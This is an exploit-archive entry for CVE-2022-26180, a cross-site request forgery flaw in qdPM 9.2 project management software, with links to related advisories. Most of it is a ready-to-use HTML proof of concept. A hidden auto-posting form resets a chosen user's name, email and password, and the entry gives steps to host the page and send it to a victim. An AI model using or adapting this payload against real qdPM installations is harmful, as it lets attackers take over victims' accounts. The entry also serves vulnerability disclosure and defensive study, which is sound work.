Lucene search
Chetanya Sharma1337DAY-ID-37583HistoryApr 07, 2022 - 12:00 a.m.
qdPM 9.2 - Cross-site Request Forgery Vulnerability
2022-04-0700:00:00
Chetanya Sharma
0day.today
174
0.002 Low
EPSS
Percentile
53.2%
# Exploit Title: qdPM 9.2 - Cross-site Request Forgery (CSRF)
# Google Dork: NA
# Exploit Author: Chetanya Sharma @AggressiveUser
# Vendor Homepage: https://qdpm.net/
# Software Link: https://sourceforge.net/projects/qdpm/files/latest/download
# Version: 9.2
# Tested on: KALI OS
# CVE : CVE-2022-26180
#
---------------
Steps to Exploit :
1) Make an HTML file of given POC (Change UserID field Accordingly)and host it.
2) send it to victim.
<html><title>qdPM Open Source Project Management - qdPM 9.2 (CSRF POC)</title>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://qdpm.net/demo/9.2/index.php/myAccount/update" method="POST">
<input type="hidden" name="sf_method" value="put" />
<input type="hidden" name="users[id]" value="1" /> <!-- Change User ID Accordingly --->
<input type="hidden" name="users[photo_preview]" value="" />
<input type="hidden" name="users[name]" value="AggressiveUser" />
<input type="hidden" name="users[new_password]" value="TEST1122" />
<input type="hidden" name="users[email]" value="administrator@Lulz.com" />
<input type="hidden" name="users[photo]" value="" />
<input type="hidden" name="users[culture]" value="en" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Related
prion
prion
Cross site request forgery (csrf)
2022-04-08 21:15:00
cve
cve
CVE-2022-26180
2022-04-08 21:15:08
cvelist
cvelist
CVE-2022-26180
2022-04-08 20:08:52
nvd
nvd
CVE-2022-26180
2022-04-08 21:15:08
packetstorm
packetstorm
qdPM 9.2 Cross Site Request Forgery
2022-04-07 00:00:00
exploitdb
exploitdb
qdPM 9.2 - Cross-site Request Forgery (CSRF)
2022-04-07 00:00:00